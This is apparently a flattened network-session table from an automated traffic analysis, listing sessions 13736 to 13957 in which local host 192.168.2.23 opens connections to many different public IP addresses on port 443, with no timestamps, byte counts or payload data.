                                                13736192.168.2.2339432190.230.150.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13737192.168.2.2347556164.158.109.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13738192.168.2.235849246.247.114.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13739192.168.2.2349216196.218.112.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13740192.168.2.235383667.105.123.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13741192.168.2.2351518158.61.38.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13742192.168.2.2347264157.195.158.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13743192.168.2.2344950130.148.241.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13744192.168.2.235853682.81.46.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13745192.168.2.235791460.167.217.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13746192.168.2.235317694.248.229.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13747192.168.2.2353588210.24.30.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13748192.168.2.2351158116.170.198.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13749192.168.2.234170412.188.203.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13750192.168.2.234743843.208.130.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13751192.168.2.2339798106.15.202.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13752192.168.2.234043699.231.68.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13753192.168.2.2334816223.168.118.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13754192.168.2.233824481.226.46.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13755192.168.2.2351050211.113.60.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13756192.168.2.234872466.244.117.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13757192.168.2.2357794135.224.208.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13758192.168.2.23402441.187.69.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13759192.168.2.234027644.184.204.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13760192.168.2.2339916190.143.125.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13761192.168.2.2345260123.161.29.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13762192.168.2.234238657.28.191.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13763192.168.2.2360266154.144.32.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13764192.168.2.2349780157.51.53.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13765192.168.2.235054823.102.56.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13766192.168.2.235853277.199.12.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13767192.168.2.235880653.94.32.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13768192.168.2.234227083.212.111.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13769192.168.2.233544660.8.100.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13770192.168.2.2338198206.236.98.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13771192.168.2.234559442.45.57.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13772192.168.2.2332792222.143.24.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13773192.168.2.2357690172.214.63.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13774192.168.2.2334148161.212.2.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13775192.168.2.2344908218.132.152.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13776192.168.2.2333070208.255.103.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13777192.168.2.2340548117.46.243.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13778192.168.2.2349986161.119.143.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13779192.168.2.233569617.143.178.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13780192.168.2.2356634196.246.220.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13781192.168.2.234330842.94.57.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13782192.168.2.234298872.88.79.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13783192.168.2.2337582140.59.255.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13784192.168.2.2354526185.238.227.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13785192.168.2.235093850.166.197.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13786192.168.2.2351922105.210.164.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13787192.168.2.2342826137.131.140.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13788192.168.2.2336206114.255.83.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13789192.168.2.235450823.24.246.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13790192.168.2.2334990198.15.241.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13791192.168.2.234592695.22.241.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13792192.168.2.2343242221.204.106.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13793192.168.2.235579286.82.12.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13794192.168.2.2345592181.250.75.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13795192.168.2.2346076184.192.170.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13796192.168.2.2342136146.199.155.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13797192.168.2.2359166195.189.218.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13798192.168.2.2358820153.224.212.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13799192.168.2.234408845.244.70.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13800192.168.2.2352930145.21.254.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13801192.168.2.235165046.112.22.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13802192.168.2.2345692120.34.171.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13803192.168.2.2339438190.19.102.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13804192.168.2.2344402103.229.48.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13805192.168.2.234923459.170.74.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13806192.168.2.2356528113.83.149.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13807192.168.2.234610468.105.109.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13808192.168.2.233628089.216.170.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13809192.168.2.2351914153.132.165.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13810192.168.2.2349672153.145.131.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13811192.168.2.2334478104.83.186.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13812192.168.2.2343810170.113.203.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13813192.168.2.2348078163.156.200.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13814192.168.2.2348198161.160.122.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13815192.168.2.235312424.119.195.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13816192.168.2.234499290.215.157.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13817192.168.2.2339714170.97.3.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13818192.168.2.2342228164.249.213.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13819192.168.2.233853467.17.178.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13820192.168.2.2339898178.70.37.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13821192.168.2.2340454197.67.244.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13822192.168.2.2334090122.152.251.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13823192.168.2.2358044180.61.237.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13824192.168.2.2339354113.124.3.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13825192.168.2.233354618.201.13.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13826192.168.2.235068824.211.66.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13827192.168.2.233821034.10.250.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13828192.168.2.2347976141.139.88.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13829192.168.2.233498269.216.216.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13830192.168.2.23361288.104.89.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13831192.168.2.2351204197.210.226.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13832192.168.2.2339664102.196.223.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13833192.168.2.2360436116.38.251.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13834192.168.2.234626024.229.155.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13835192.168.2.234444440.115.56.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13836192.168.2.234137093.118.251.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13837192.168.2.235871017.122.34.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13838192.168.2.2345180210.48.243.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13839192.168.2.2338244139.147.49.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13840192.168.2.2349038178.3.175.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13841192.168.2.235167649.32.140.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13842192.168.2.23596224.125.0.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13843192.168.2.2347928185.82.188.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13844192.168.2.234668898.254.218.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13845192.168.2.234415441.239.166.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13846192.168.2.234996889.197.157.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13847192.168.2.2342040164.82.215.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13848192.168.2.235736424.203.34.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13849192.168.2.234338683.118.231.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13850192.168.2.235951886.133.174.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13851192.168.2.2346826150.133.61.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13852192.168.2.2352046105.147.11.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13853192.168.2.2355252161.95.14.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13854192.168.2.234160225.29.147.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13855192.168.2.2332840121.41.174.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13856192.168.2.235887853.98.236.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13857192.168.2.2334630200.154.144.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13858192.168.2.2339142192.165.20.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13859192.168.2.235510862.219.103.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13860192.168.2.2351088212.149.158.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13861192.168.2.2359770179.176.240.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13862192.168.2.235290467.210.104.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13863192.168.2.2358760169.208.165.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13864192.168.2.2345454102.103.57.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13865192.168.2.234164242.232.180.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13866192.168.2.2347696151.46.213.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13867192.168.2.235336418.42.34.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13868192.168.2.2355062137.92.218.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13869192.168.2.2340974141.11.180.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13870192.168.2.236071676.125.95.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13871192.168.2.2339888210.64.49.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13872192.168.2.2336228145.223.35.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13873192.168.2.2360938195.224.96.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13874192.168.2.235314895.101.36.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13875192.168.2.234899412.254.233.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13876192.168.2.2360408178.92.41.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13877192.168.2.235771265.221.25.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13878192.168.2.2357418121.234.92.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13879192.168.2.234359234.207.25.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13880192.168.2.2352148193.165.162.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13881192.168.2.234581279.128.33.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13882192.168.2.2358874157.135.229.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13883192.168.2.2339772162.250.5.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13884192.168.2.233448281.10.164.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13885192.168.2.2354206111.142.231.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13886192.168.2.2355266195.111.162.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13887192.168.2.2346120109.123.84.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13888192.168.2.2334120104.98.40.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13889192.168.2.2334408204.26.118.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13890192.168.2.2345078172.13.125.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13891192.168.2.2336382161.248.115.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13892192.168.2.2344242148.56.104.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13893192.168.2.2350428162.176.111.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13894192.168.2.2337452182.138.57.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13895192.168.2.235079825.206.57.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13896192.168.2.2359074201.231.128.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13897192.168.2.2347228128.108.115.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13898192.168.2.234403667.69.236.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13899192.168.2.2359602221.224.162.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13900192.168.2.234771019.3.200.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13901192.168.2.2337142146.122.78.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13902192.168.2.234123042.113.72.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13903192.168.2.2347524209.240.120.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13904192.168.2.234356619.94.170.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13905192.168.2.2341050166.40.74.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13906192.168.2.235702486.68.220.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13907192.168.2.234015632.81.92.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13908192.168.2.233471095.141.137.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13909192.168.2.2348228194.155.180.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13910192.168.2.2335168150.60.247.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13911192.168.2.2353130212.96.130.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13912192.168.2.235984620.187.198.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13913192.168.2.2357916180.223.197.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13914192.168.2.234978439.238.169.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13915192.168.2.23505001.226.184.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13916192.168.2.2356554131.191.8.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13917192.168.2.235187637.21.157.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13918192.168.2.2356190103.165.126.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13919192.168.2.2345752189.189.233.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13920192.168.2.2353286212.178.132.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13921192.168.2.234209899.72.132.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13922192.168.2.2357128152.38.8.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13923192.168.2.2350580137.165.182.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13924192.168.2.2354950158.98.20.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13925192.168.2.2345240185.191.100.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13926192.168.2.2340678121.69.42.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13927192.168.2.2356692188.153.20.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13928192.168.2.2333972211.231.232.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13929192.168.2.234986265.251.126.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13930192.168.2.2349646156.255.111.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13931192.168.2.2346200190.2.232.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13932192.168.2.2345872163.210.130.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13933192.168.2.234352083.120.213.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13934192.168.2.236060240.159.46.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13935192.168.2.235762043.142.251.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13936192.168.2.2360152121.102.213.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13937192.168.2.235800286.17.42.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13938192.168.2.2340516219.67.19.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13939192.168.2.235542681.172.215.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13940192.168.2.233610088.184.246.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13941192.168.2.2344114175.233.245.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13942192.168.2.2333834158.141.58.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13943192.168.2.234611024.245.76.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13944192.168.2.2350028182.144.76.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13945192.168.2.2354570154.100.48.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13946192.168.2.2350290106.79.117.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13947192.168.2.235487093.171.55.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13948192.168.2.2340876147.83.243.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13949192.168.2.2359670175.3.51.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13950192.168.2.2339558195.42.140.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13951192.168.2.2344614171.124.177.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13952192.168.2.2346200207.98.98.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13953192.168.2.234156436.171.154.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13954192.168.2.2356500161.163.245.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13955192.168.2.234903275.163.80.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13956192.168.2.2349542148.150.114.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13957192.168.2.2334012134.240.26.97443
                                                TimestampBytes transferredDirectionData


